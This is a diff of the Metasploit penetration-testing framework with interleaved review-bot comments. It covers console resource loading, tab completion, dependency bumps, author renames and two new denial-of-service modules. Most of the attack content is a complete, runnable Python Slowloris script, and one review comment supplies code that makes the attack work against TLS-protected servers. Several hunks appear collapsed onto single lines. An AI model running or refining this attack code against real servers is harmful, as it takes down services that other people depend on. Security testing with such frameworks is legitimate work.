+ print_error("#{res} is not a valid resource file")
+ next
+ end
 end
 end
 
 def cmd_resource_tabs(str, words)
- return [] if words.length > 1
-
- tab_complete_filenames(str, words)
+ tabs = []
+ #return tabs if words.length > 1
+ if ( str and str =~ /^#{Regexp.escape(::File::SEPARATOR)}/ )
+ # then you are probably specifying a full path so let's just use normal file completion
+ return tab_complete_filenames(str,words)
+ elsif (not words[1] or not words[1].match(/^\//))
+ # then let's start tab completion in the scripts/resource directories
+ begin
+ [
+ ::Msf::Config.script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter',
+ ::Msf::Config.user_script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter',
+ '.'
+ ].each do |dir|
+ next if not ::File.exist? dir
+ tabs += ::Dir.new(dir).find_all { |e|
+ path = dir + ::File::SEPARATOR + e
+ ::File.file?(path) and ::File.readable?(path)
+ }
+ end
+ rescue Exception
+ end
+ else
+ tabs += tab_complete_filenames(str,words)
+ end
+ return tabs
 end
 
 def cmd_enable_unicode_encoding
diff --git a/lib/rex/ui/text/dispatcher_shell.rb b/lib/rex/ui/text/dispatcher_shell.rb
index 878010829c..24096284bf 100644
--- a/lib/rex/ui/text/dispatcher_shell.rb
+++ b/lib/rex/ui/text/dispatcher_shell.rb
@@ -2,6 +2,7 @@
 require 'rex/ui'
 require 'pp'
 require 'rex/text/table'
+require 'erb'
 
 module Rex
 module Ui
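Review bot: In cmd_resource the bare `elsif` has no condition of its own: the `[ … ].each do |dir| … end` expression on the following lines becomes its condition, which is always truthy, so the construct only works because the lookup happens as a side effect of evaluating the condition and reads as an accidental `else`; write `else` and let the array walk be the branch body. In cmd_resource_tabs the `rescue Exception` with an empty body swallows everything, Interrupt included, while listing directories, and the commented-out `#return tabs if words.length > 1` is dead code; narrow the rescue to `rescue ::SystemCallError, ::IOError` (what a missing or unreadable directory actually raises) and delete the dead line. Both methods are complete within the hunk.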
@@ -248,6 +249,56 @@ module DispatcherShell
 matches
 end
 
+ #
+ # Provide a generic tab completion function based on the specification
+ # pass as fmt. The fmt argument in a hash where values are an array
+ # defining how the command should be completed. The first element of the
+ # array can be one of:
+ # nil - This argument is a flag and takes no option.
+ # true - This argument takes an option with no suggestions.
+ # :address - This option is a source address.
+ # :bool - This option is a boolean.
+ # :file - This option is a file path.
+ # Array - This option is an array of possible values.
+ #
+ def tab_complete_generic(fmt, str, words)
+ last_word = words[-1]
+ fmt = fmt.select { |key, value| last_word == key || !words.include?(key) }
+
+ val = fmt[last_word]
+ return fmt.keys if !val # the last word does not look like a fmtspec
+ arg = val[0]
+ return fmt.keys if !arg # the last word is a fmtspec that takes no argument
+
+ tabs = []
+ if arg.to_s.to_sym == :address
+ tabs = tab_complete_source_address
+ elsif arg.to_s.to_sym == :bool
+ tabs = ['true', 'false']
+ elsif arg.to_s.to_sym == :file
+ tabs = tab_complete_filenames(str, words)
+ elsif arg.kind_of?(Array)
+ tabs = arg.map {|a| a.to_s}
+ end
+ tabs
+ end
+
+ #
+ # Return a list of possible source addresses for tab completion.
+ #
+ def tab_complete_source_address
+ addresses = [Rex::Socket.source_address]
+ # getifaddrs was introduced in 2.1.2
+ if Socket.respond_to?(:getifaddrs)
+ ifaddrs = Socket.getifaddrs.find_all do |ifaddr|
+ ((ifaddr.flags & Socket::IFF_LOOPBACK) == 0) &&
+ ifaddr.addr &&
+ ifaddr.addr.ip?
+ end
+ addresses += ifaddrs.map { |ifaddr| ifaddr.addr.ip_address }
+ end
+ addresses
+ end
 end
 
 #
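Review bot: The tab_complete_generic docstring has two slips—`pass as fmt` should read `passed as fmt`, and `The fmt argument in a hash` should read `The fmt argument is a hash`. In the body `value` in `fmt.select { |key, value| … }` is unused and should be `_value`, and the three `arg.to_s.to_sym == …` comparisons plus `arg.kind_of?(Array)` would read better as one `case arg` with `when :address`, `when :bool`, `when :file`, `when Array` and an `else` yielding `[]`, which also stops an Array spec from being stringified just to compare it against symbols; that rewrite is only equivalent if callers always pass symbols, as the docstring says they do. Both methods are complete within the hunk.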
@@ -368,6 +419,73 @@ module DispatcherShell return items end + # Processes a resource script file for the console. + # + # @param path [String] Path to a resource file to run + # @return [void] + def load_resource(path) + if path == '-' + resource_file = $stdin.read + path = 'stdin' + elsif ::File.exist?(path) + resource_file = ::File.read(path) + else + print_error("Cannot find resource script: #{path}") + return + end + + # Process ERB directives first + print_status "Processing #{path} for ERB directives." + erb = ERB.new(resource_file) + processed_resource = erb.result(binding) + + lines = processed_resource.each_line.to_a + bindings = {} + while lines.length > 0 + + line = lines.shift + break if not line + line.strip! + next if line.length == 0 + next if line =~ /^#/ + + # Pretty soon, this is going to need an XML parser :) + # TODO: case matters for the tag and for binding names + if line =~ /|\s+)/ + bin = ($~[1] || $~[2]) + bindings[bin] = binding unless bindings.has_key? bin + bin = bindings[bin] + else + bin = binding + end + buff = '' + while lines.length > 0 + line = lines.shift + break if not line + break if line =~ /<\/ruby>/ + buff << line + end + if ! buff.empty? + session = client + framework = client.framework + + print_status("resource (#{path})> Ruby Code (#{buff.length} bytes)") + begin + eval(buff, bin) + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_error("resource (#{path})> Ruby Error: #{e.class} #{e} #{e.backtrace}") + end + end + else + print_line("resource (#{path})> #{line}") + run_single(line) + end + end + end + # # Run a single command line. # @@ -464,7 +582,7 @@ module DispatcherShell inst = dispatcher.new(self) self.dispatcher_stack.each { |disp| if (disp.name == inst.name) - raise RuntimeError.new("Attempting to load already loaded dispatcher #{disp.name}") + raise "Attempting to load already loaded dispatcher #{disp.name}" end } self.dispatcher_stack.push(inst) 
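Review bot: The `rescue ::Exception => e` around `eval(buff, bin)` in load_resource swallows SystemExit and NoMemoryError along with script errors, so an `exit` inside a `<ruby>` block just prints a "Ruby Error" and the loop carries on; `rescue ::StandardError, ::ScriptError => e` still reports syntax errors from the evaluated block while letting process-level exceptions propagate. `session = client` and `framework = client.framework` run outside that begin block and depend on the including shell defining `client`, which DispatcherShell itself does not; presumably only the meterpreter console reaches this path, but a `respond_to?(:client)` guard or a doc note would make that explicit. Since the method evaluates ERB directives and `<ruby>` blocks with the console's own privileges, the parameter doc should say so: `# @param path [String] Path to a resource file to run; the file is executed as trusted code (ERB and <ruby> blocks), so only load scripts you control`.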
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 6accc821ad..177deef087 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,9 +70,9 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.11' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.18' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.2' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.8' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. @@ -139,7 +139,7 @@ Gem::Specification.new do |spec| # Library for Generating Randomized strings valid as Identifiers such as variable names spec.add_runtime_dependency 'rex-random_identifier' # library for creating Powershell scripts for exploitation purposes - spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"] + spec.add_runtime_dependency 'rex-powershell', ["< 0.1.78"] # Library for processing and creating Zip compatbile archives spec.add_runtime_dependency 'rex-zip' # Library for parsing offline Windows Registry files diff --git a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb index 267a21fa22..d7d8a45b5d 100644 --- a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb +++ b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary verifies that the directory has been created, then deletes it and verifies deletion to confirm the bug. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ 
diff --git a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb index b52505b78b..24ad229369 100644 --- a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb +++ b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary [ 'OSVDB', '54551' ], [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ], ], - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE) register_options( diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb index 2b4f81af1c..3c6d4bc109 100644 --- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb +++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary systems, however at this stage the module only works against Windows. This module does not apply to HP printers. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb index 76f03693a3..e33e2f3163 100644 --- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb +++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary [ 'OSVDB', '55586' ], [ 'CVE', '2009-2367' ], ], - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb index 98f66d9436..2680d65785 100644 --- a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb +++ b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb 
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Auxiliary [ 'CVE', '2008-2938' ], [ 'URL', 'http://www.securityfocus.com/archive/1/499926' ], ], - 'Author' => [ 'patrick','guerrino di massa' ], + 'Author' => [ 'aushack','guerrino di massa' ], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Jan 9 2009' ) diff --git a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb index 3fc6403248..0e5679db0c 100644 --- a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb +++ b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb @@ -29,7 +29,7 @@ class MetasploitModule < Msf::Auxiliary [ 'EDB', '17388' ], [ 'BID', '48225' ], ], - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Jan 9 2009' ) diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb index 4675bb60b2..ca7b23d680 100644 --- a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb +++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary [ 'BID', '31531' ], [ 'URL', 'http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt' ], ], - 'Author' => [ 'Anshul Pandey ', 'patrick' ], + 'Author' => [ 'Anshul Pandey ', 'aushack' ], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index a4ed39faa3..114408d08c 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary be exploited with a valid username and password. The From address is the file owner. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ 
diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb index 59c0c1705c..dc166d67d0 100644 --- a/modules/auxiliary/admin/smb/check_dir_file.rb +++ b/modules/auxiliary/admin/smb/check_dir_file.rb @@ -29,7 +29,7 @@ class MetasploitModule < Msf::Auxiliary }, 'Author' => [ - 'patrick', + 'aushack', 'j0hn__f' ], 'References' => diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb index b6464a6afe..e9fd575d6c 100644 --- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb +++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.2(18)P. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/http/3com_superstack_switch.rb b/modules/auxiliary/dos/http/3com_superstack_switch.rb index c40f133e30..d67c7aba1d 100644 --- a/modules/auxiliary/dos/http/3com_superstack_switch.rb +++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb @@ -18,11 +18,11 @@ class MetasploitModule < Msf::Auxiliary against a 3300SM firmware v2.66. Reported to affect versions prior to v2.72. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ - # patrickw - I am not sure if these are correct, but the closest match! + # aushack - I am not sure if these are correct, but the closest match! [ 'OSVDB', '7246' ], [ 'CVE', '2004-2691' ], [ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ], diff --git a/modules/auxiliary/dos/http/dell_openmanage_post.rb b/modules/auxiliary/dos/http/dell_openmanage_post.rb index 70b6bea12d..967ad612d6 100644 --- a/modules/auxiliary/dos/http/dell_openmanage_post.rb 
+++ b/modules/auxiliary/dos/http/dell_openmanage_post.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary This module will crash the web server, however it is likely exploitable under certain conditions. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb new file mode 100644 index 0000000000..e1ed130c04 --- /dev/null +++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb @@ -0,0 +1,70 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "IBM Notes Denial Of Service", + 'Description' => %q( + This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes. + If successful, the browser will crash after viewing the webpage. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Dhiraj Mishra', + ], + 'References' => [ + ['EDB', '42604'], + [ 'CVE', '2017-1130' ] + ], + 'DisclosureDate' => 'Aug 31 2017', + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + ) + ) + end + + def run + exploit # start http server + end + + def setup + @html = %| + + + + + | + end + + def on_request_uri(cli, _request) + print_status('Sending response') + send_response(cli, @html) + end +end diff --git a/modules/auxiliary/dos/http/slowloris.py b/modules/auxiliary/dos/http/slowloris.py new file mode 100755 index 0000000000..416b1bbf5e --- /dev/null +++ b/modules/auxiliary/dos/http/slowloris.py 
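Review bot: on_request_uri in ibm_lotus_notes2.rb sends the crash page to every client that hits the URI and only logs "Sending response", so the console gives no way to tell whether the visitor was the Notes embedded browser the description targets or a stray crawler; `print_status("Sending response to #{cli.peerhost} (#{request.headers['User-Agent']})")`, with the `_request` parameter renamed to `request`, costs one line and makes triage possible. `setup` is overridden without calling `super`; if Msf::Exploit::Remote::HttpServer depends on its own setup (I cannot confirm that from the hunk), assigning `@html` in `run` before `exploit` would sidestep the question. The trailing comma in the single-element `Author` array is harmless but inconsistent with the other modules in this diff.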
@@ -0,0 +1,139 @@ +#!/usr/bin/env python +# Note, works with both python 2.7 and 3 + +import random +import socket +import ssl +import string +import time + +from metasploit import module + +metadata = { + 'name': 'Slowloris Denial of Service Attack', + 'description': ''' + Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. + It accomplishes this by opening connections to the target web server and sending a partial request. + Periodically, it will send subsequent HTTP headers, adding to-but never completing-the request. + Affected servers will keep these connections open, filling their maximum concurrent connection pool, + eventually denying additional connection attempts from clients. + ''', + 'authors': [ + 'RSnake', # Vulnerability disclosure + 'Gokberk Yaltirakli', # Simple slowloris in Python + 'Daniel Teixeira', # Metasploit module (Ruby) + 'Matthew Kienow ' # Metasploit external module (Python) + ], + 'date': '2009-06-17', + 'references': [ + {'type': 'cve', 'ref': '2007-6750'}, + {'type': 'cve', 'ref': '2010-2227'}, + {'type': 'url', 'ref': 'https://www.exploit-db.com/exploits/8976/'}, + {'type': 'url', 'ref': 'https://github.com/gkbrk/slowloris'} + ], + 'type': 'dos', + 'options': { + 'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None}, + 'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 80}, + 'sockets': {'type': 'int', 'description': 'The number of sockets to use in the attack', 'required': True, 'default': 150}, + 'delay': {'type': 'int', 'description': 'The delay between sending keep-alive headers', 'required': True, 'default': 15}, + 'ssl': {'type': 'bool', 'description': 'Negotiate SSL/TLS for outgoing connections', 'required': True, 'default': False}, + 'rand_user_agent': {'type': 'bool', 'description': 'Randomizes user-agent with each request', 'required': True, 'default': True} + }} + +list_of_sockets 
= [] +user_agents = [ + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0", + "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0", +] + + +def create_random_header_name(size=8, seq=string.ascii_uppercase + string.ascii_lowercase): + return ''.join(random.choice(seq) for _ in range(size)) + + +def init_socket(host, port, use_ssl=False, rand_user_agent=True): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(4) + + if use_ssl: + s = ssl.wrap_socket(s) + + s.connect((host, port)) + + s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8")) + + if rand_user_agent: + s.send("User-Agent: {}\r\n".format(random.choice(user_agents)).encode("utf-8")) + else: + s.send("User-Agent: {}\r\n".format(user_agents[0]).encode("utf-8")) + + s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8")) + return s + + +def run(args): + host = args['rhost'] + port = int(args['rport']) + use_ssl = args['ssl'] == "true" + rand_user_agent = args['rand_user_agent'] == "true" + socket_count = int(args['sockets']) + delay = int(args['delay']) + + module.log("Attacking %s with %s sockets" % (host, socket_count), 'info') + + module.log("Creating sockets...", 'info') + for i in range(socket_count): + try: + module.log("Creating socket number %s" % i, 'debug') + s = init_socket(host, port, 
use_ssl=use_ssl, rand_user_agent=rand_user_agent) + except socket.error: + break + list_of_sockets.append(s) + + while True: + module.log("Sending keep-alive headers... Socket count: %s" % len(list_of_sockets), 'info') + for s in list(list_of_sockets): + try: + s.send("{}: {}\r\n".format(create_random_header_name(random.randint(8, 16)), + random.randint(1, 5000)).encode("utf-8")) + + except socket.error: + list_of_sockets.remove(s) + + for _ in range(socket_count - len(list_of_sockets)): + module.log("Recreating socket...", 'debug') + try: + s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent) + if s: + list_of_sockets.append(s) + except socket.error: + break + time.sleep(delay) + + +if __name__ == "__main__": + module.run(metadata, run) diff --git a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb index 2e244dd9c5..8fc13a0c06 100644 --- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb +++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary string data. With physical access to the device and debugging, this module may be able to be used to execute arbitrary code remotely. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ [ 'BID', '35145' ], diff --git a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb index 6aad396325..d9d68bcb0e 100644 --- a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb +++ b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary (Remote Access Services). Kernel memory is overwritten resulting in a BSOD. Code execution may be possible however this module is only a DoS. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ 
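Review bot: The `user_agents` list is missing a comma after the `Edge/14.14393` entry, so implicit string concatenation fuses it with the following Chrome/53 entry into one bogus User-Agent and the list is one element shorter than it looks; add the comma. `init_socket` also wraps with the deprecated `ssl.wrap_socket(s)`, which sends no SNI, so an SSL target that routes by server name may reject the handshake before any slow request is queued; wrapping through an `SSLContext` with `server_hostname=host` (verification off, since the target's certificate is irrelevant to a DoS) fixes that on both Python 2.7.9+ and 3. Finally, `s.send` can return a short write on the partial request lines; `sendall` is the safer call for the header fragments.
```python
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393",
    # … unchanged: remaining user agents …

def init_socket(host, port, use_ssl=False, rand_user_agent=True):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(4)

    if use_ssl:
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        ctx.verify_mode = ssl.CERT_NONE
        s = ctx.wrap_socket(s, server_hostname=host)

    s.connect((host, port))
    # … unchanged: request line and header sends (use sendall) …
```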
diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb index cc1583c8d3..7fc5008765 100644 --- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb +++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00 bytes can be used, limiting the likelihood for arbitrary code execution. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ [ 'OSVDB', '2577' ], diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb index 4c258ee293..85d5dc9e55 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary when running, will overwrite the stack with our string and generate an exception. The FileZilla FTP Server itself will continue functioning. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb index 663fec8cbf..f39899757f 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary Server versions 0.9.21 and earlier. By sending a malformed PORT command then LIST command, the server attempts to write to a NULL pointer. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/gather/checkpoint_hostname.rb b/modules/auxiliary/gather/checkpoint_hostname.rb index 8b8fe85c16..0cf696d5e2 100644 --- a/modules/auxiliary/gather/checkpoint_hostname.rb 
+++ b/modules/auxiliary/gather/checkpoint_hostname.rb @@ -21,11 +21,11 @@ class MetasploitModule < Msf::Auxiliary networks where the hostname reveals the physical location and rack number of the device, which may be unintentionally published to the world. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'DisclosureDate' => 'Dec 14 2011', # Looks like this module is first real reference 'References' => [ - # patrickw - None? Stumbled across, probably an old bug/feature but unsure. + # aushack - None? Stumbled across, probably an old bug/feature but unsure. [ 'URL', 'http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ], [ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ] ] diff --git a/modules/auxiliary/gather/citrix_published_applications.rb b/modules/auxiliary/gather/citrix_published_applications.rb index cce142b7bb..6146c7eb4a 100644 --- a/modules/auxiliary/gather/citrix_published_applications.rb +++ b/modules/auxiliary/gather/citrix_published_applications.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary This module attempts to query Citrix Metaframe ICA server to obtain a published list of applications. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ [ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ], diff --git a/modules/auxiliary/gather/citrix_published_bruteforce.rb b/modules/auxiliary/gather/citrix_published_bruteforce.rb index c2afcd4012..d40f550b22 100644 --- a/modules/auxiliary/gather/citrix_published_bruteforce.rb +++ b/modules/auxiliary/gather/citrix_published_bruteforce.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary This module attempts to brute force program names within the Citrix Metaframe ICA server. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ [ 'OSVDB', '50617' ], 
